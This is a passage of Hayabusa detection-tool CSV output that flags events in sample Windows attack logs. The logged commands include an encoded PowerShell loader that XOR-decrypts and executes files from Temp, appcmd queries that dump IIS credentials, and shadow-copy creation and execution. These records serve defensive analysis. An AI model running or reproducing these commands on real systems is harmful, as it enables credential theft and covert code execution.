AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:20.555 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-28 00:12:38.241 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c whoami /groups : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /groups : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c whoami /groups ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: 